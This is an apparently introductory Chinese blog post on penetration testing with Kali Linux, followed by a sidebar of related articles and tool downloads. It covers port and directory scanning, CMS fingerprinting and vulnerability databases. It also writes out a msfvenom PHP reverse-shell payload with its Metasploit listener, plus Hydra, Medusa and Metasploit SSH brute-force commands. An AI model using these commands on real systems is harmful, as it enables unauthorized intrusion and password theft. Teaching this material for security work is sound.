【渗透测试】

于 2024-03-14 21:34:27 发布
阅读量1k 收藏 9
点赞数 28
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52648141/article/details/136665936
版权
本文详细介绍了使用KaliLinux进行渗透测试的过程,包括信息搜集(端口扫描、目录扫描、CMS识别和资产收集)、漏洞利用(漏洞数据库、漏洞扫描、MSF反弹连接及密码爆破),为网络安全测试提供了实用的工具和技术指导。
摘要由CSDN通过智能技术生成

渗透测试

渗透测试流程:
在这里插入图片描述

一、kali信息搜集

1、端口扫描

常见的端口服务

http:80
https:443
ftp:21
ssh :22
mysql:3306
mssql:1433
rsync:873
oracle:1521
nginx:80
mongo:28017
redis:6379
tomcat:8080
smtp:25
POP3:110
dns:53
telent:23
vnc:5900
rdp:3389
weblogic:7001

工具:

Nmap
Nmap(网络映射器)是最常用的的工具之一。
Netcat
Advanced Port Scanner
Angry IP Scanner等等

2、目录扫描

1.组织一个词典(常见敏感的文件、目录)
2.拼接在网站根目录后面发起访问
如果响应是404不存在,如果是200存在

工具:

Burp Suitedirb
御剑
dirbuster

3、CMS系统指纹识别

常见CMS(Content Management System)

在这里插入图片描述

工具:

whatweb
CMSeeK
Wappalyzer
在线网站
御剑指纹扫描器
Test404轻量CMS指纹识别

4、资产收集工具

ARL灯塔
yakit
goby

二、kali漏洞利用

1、漏洞数据库

CVE (Common Vulnerabilities & Exposures )
https://cve.mitre.org/
https://www.cvedetails.com/
https://www.cnvd.org.cn/
https://nox.qianxin.com/vulnerability

POC/EXP

POC: Proof Of Concept
EXP: Exploit利用

POC/EXP工具集
01、

https://www.exploit-db.comgithub

02、

msf /usr/share/exploitdb/exploits/linux/local/(kali)

在这里插入图片描述

03、

pocsuite

2、漏洞扫描工具

商业漏洞扫描工具

Appscan
Nessus
OpenVAS

免费漏洞扫描工具

goby
Burp
https://github.com/k8gege/Ladon

国产商业漏洞扫描产品

在这里插入图片描述

3、msf反弹连接(metasploit framework)

01生成payload
msfvenom -p php/meterpreter/reverse_tcplhost=192.168.142.132 Iport=7777 -o shell.php

192.168.142.132:kali(控制着、攻击者)的IP
7777自定义的
02监听

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.142.132
set lport 7777
exploit

4、B P爆破web密码

抓包之后
在这里插入图片描述

先清空
在这里插入图片描述
选中所需 add
在这里插入图片描述
加载字典,开始爆破
在这里插入图片描述
可以点length或者status看看哪个的响应不一样
在这里插入图片描述

5、Hydra暴破Linux密码

**hydra -L username.txt -P password.txt 192.168.142.66 ssh**(字典)

medusa -M ssh -h 192.168.142.66 -u root -P password.txt
msfconsole

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.142.66
set PASS_FILE password.txt
set USER_FILE username.txt
exploit
想做一个逆向手
关注
  • 28
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Test404漏洞扫描器最新版
05-03
Test404漏洞扫描器最新版
Test404漏洞扫描器1.7
05-25
集成了很多插件和功能,基本上这一个工具就够了,用过Test404的用户都知道,还是非常不错的工具!推荐!!!
ASP.NETCore统一处理404错误都有哪些方式?
dotNET跨平台
04-15 803
当未找到网页并且应用程序返回 404 错误时,ASP.NET Core MVC 仅呈现通用浏览器错误页面,如下图所示这不是很优雅,是吗?我们平时看到的404页面一般是这样的还有这样的试了下京东,地址不存在的时候是会重定向到首页下面就来演示下ASP.NET Core中如何实现这种自定义的404页面处理。新建项目 ASP.NET Core MVC(WebApi处理方式也一样)...
渗透测试工具-Cobalt Strike
最新发布
03-21
**Cobalt Strike:渗透测试的强大武器** Cobalt Strike(简称CS)是一款广泛应用于网络安全领域的高级渗透测试工具,主要用于模拟攻击者的行为,帮助安全专业人员检测和评估组织的防御能力。这款工具以其强大的功能...
安全测试与渗透测试区别
03-23
安全测试与渗透测试区别.安全测试不同于渗透测试渗透测试侧重于几个点的穿透攻击,而安全测试是侧重于对安全威胁的建模,系统的对来自各个方面,各个层面威胁的全面考量。安全测试可以告诉您,您的系统可能会来自...
渗透测试授权书》.doc
12-09
渗透测试授权书》是甲乙双方在进行渗透测试前签订的重要法律文件,它规定了双方在测试过程中的权利和责任,确保测试的合法性和安全性。渗透测试是一种模拟黑客攻击的技术手段,用于评估计算机网络、系统和应用程序...
PC端(cs客户端)渗透测试规范
03-19
PC端(cs客户端)渗透测试用例,涵盖PC端程序渗透测试规范和渗透测试用例,针对PC端渗透测试用这个就够了
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南 内网安全攻防渗透测试实战指南是指在内网中进行的渗透测试实战指南,旨在帮助安全人员和渗透测试人员更好地理解内网安全攻防的原理和方法。 内网安全攻防渗透测试实战指南主要包含...
Test404漏洞扫描器,功能不错,挺全面!
07-17
集成了很多插件和功能,基本上这一个工具就够了,用过Test404的用户都知道,还是非常不错的工具!推荐!!!
Test404轻量后台扫描器 V1.5.zip
07-08
404轻量后台扫描器 V1.5
Test404 HTTP Fuzzer v4.1
10-23
简介: HTTP Fuzzer是一款为了评估WEB应用而生的Fuzz(Fuzz是爆破的一种手段)工具,它基于一个简单的理念,即用给定的Payload去fuzz。它允许在HTTP请求里注入任何输入的值,针对不同的WEB应用组件进行多种复杂的爆破攻击。比如:参数、认证、表单、目录/文件、头部等等。 描述: 在Fuzz请求完成后,目标应用发回来的响应提供了Fuzz请求所造成影响的各种线索。如果发现了异常,就可以确定于异常相关的请求。下面总结了一些响应信息,这些响应信息可能指示漏洞条件的存在:HTML状态码、响应中的错误信息、响应中包含的用户输入、性能下降、请求超时、WEB Fuzzer错误信息、处理或者未处理的异常 功能: 1.递归(目录发掘)、Post数据爆破、头部爆破 2.返回码、特征、行数等等来隐藏结果、排除错误 3.URL编码、多线程、伪造UA、伪造代理、多参数fuzz 4.输出HTML(详细报告,点击链接查看内容,POST数据也能阅览)、多彩输出 特点: 稳 定:线程式的程序设计 精简化的代码质量 稀少的崩溃重启率 智 能:傻瓜式的配置向导 多样化的插件中心 自动化的启动优化 简 约:轻便化的框架设计 简洁化的设计理念 性能式的设计优化 高 效:毫秒级的响应速度 深度的Request优化 模块化的加载模式
Test404网站备份文件扫描器 v2.0.rar
06-03
TEST404备份文件扫描器,发现网站的备份文件,快速,轻量级。该软件是扫描网站目录里的文件,格式后缀为.zip .rar .tar .gz.tgz 等
Test404网站备份文件扫描器 v2.0(网站备份文件扫描工具)
03-05
Test404网站备份文件扫描器 v2.0(网站备份文件扫描工具) Test404网站备份文件扫描器,用于可下载的网站包括backup db data web wwwroot database www code test admin user a 1 bbs 123 data bak oa admin wwww 2014 2015 2016 2014 2015 2016 2017 2018 2019 2020 1 2 2 123 a back backup bak bbs bbs beifen beian data db flashfxp fdsa ftp localhost gg hdocs hdocs HYTop.mdb root? Release Rel
信息收集----CMS指纹识别
qq_44418229的博客
04-30 3675
CMS指纹识别,了解目标网站用了什么框架,什么数据库,什么代理,充分了解目标后可以去查一些nday来进行攻击
“百度杯”CTF比赛 九月场-web123题
weixin_46784800的博客
12-29 508
“百度杯”CTF比赛 九月场-web123题 知识储备 敏感信息泄露 敏感信息泄露,是指存在一些备份文件未经处理,而保存在网站目录上,可以进行访问,获得一些信息。 网站备份文件泄露常见后缀: .bak .html _index.html .swp .rar .txt .zip .7z .sql .tar.gz .tgz .tar 网站备份文件泄露扫描工具: Test404网站备份文件扫描器 v2.0(win) ihoneyBakFileScan(python) ​ ihoneyBakFile
@WebMVCTest中的404问题分析
木小鱼的笔记
05-02 2336
问题分析 在创建单元测试Controller过程中,碰到了一个问题,具体如下: MockHttpServletResponse: Status = 404 Error message = null Headers = {} Content type = null Body = Forwarded URL...
一款集成了多种老牌工具字典的轻量级目录扫描器
公众号:乌云安全
06-12 778
dirxk,一款集成了多种老牌工具字典的轻量级目录扫描器,包括御剑后台扫描字典,test404网站备份,web破壳扫描器,御剑1.5扫描字典,御剑专业版字典,wwwscan字典,dirscan字典,dirsafe字典,swebscan等字典已合并去重。支持多线程扫描,可指定线程数。随机user-agent头。-x指定X-forward-for头,默认随机。-f支持导入字典检测。-o导出html报告-m指定扫描方法(head,get,post)-c指定状态码-m指定内置字典。
Metasploit渗透测试实战指南
"Metasploit渗透测试指南中文版" Metasploit是网络安全领域中的一款强大工具,主要用于渗透测试和安全漏洞的研究。《Metasploit渗透测试指南》是一本深入讲解该平台的专业书籍,由David Kennedy、Jim O’Gorman、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值